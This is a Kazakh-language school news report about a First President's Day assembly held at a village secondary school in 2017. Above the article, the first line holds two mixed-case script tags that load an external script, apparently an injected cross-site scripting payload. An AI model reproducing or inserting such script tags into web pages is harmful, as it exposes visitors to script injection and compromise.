<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.12.2017

Қатаркөл ауылы, Досов атындағы  орта

мектебінде тұңғыш Президент күніне арналған рухани жаңғыру бағдарламасы  негізінде қарашаның отызы күні мектептің

мәжіліс залында «Елі сүйген, елін сүйген Елбасы» атты мерекелік іс-шара  өткізілді. Мерекелік іс-шараның мақсаты: оқушыларға

Президенттің елі үшін жасаған игі істерін үлгі-өнеге ету, өз Отанын, халқын

сүйетін азамат болып өсуге, елжандылыққа, отансүйгіштікке тәрбиелеу. Мерекелік

іс-шара еліміздің ән ұранымен басталып,  Перзидентіміздің ба­лалық

шағы, отбасы, қызмет жолы, лауазымдары мен мансап­тары, жаз­ған еңбектері,

дәйек сөз­дері, Н.Ә.Назарбаев атына ашылған оқу орындары жөнінде мә­ліметтер

айтылып, оқушылар Ел­басымыз туралы білімдерін ке­ңейтті. Президентіміздің

сөйлеген сөзінен үзінділер тыңдалып, түр­лі слайдтар көрсетілді. Елбасының

балалық шағына саяхат жасалып бейнероликтер көрсетілді. Кешке әр сынып өз  өнерлерімен ортаға шықты. Әр өнерпаз

бір-бірінен асып түсті.  Жаңа педа­го­гикалық

технологияның әдіс-тә­сілдері қолданылды. Өнерпаздардың патриоттық ән мен

жырларынан кешке келген қонақтар мен ата-аналар тамсанып билей түсті. Мерекелік

іс-шараның соңы мектептің белсенді патриоттарын марапаттаумен аяқталды.Сөз

соңында еліміздің патриоттарын тәрбиелеу әр адамның өзінен басталмақ демекпін!

Ұлт жанды, патриот болайық ағайын!

 

 

 

 

                                                                         

Қатарқөл ауылы

                                                                             

Досов орта мектебінің

директорының тәрбие ісі-жөніндегі

орынбасары

Байманова П.М

Просмотров: 443


Пікір қосу



Деректерді қолтаңбаға қосу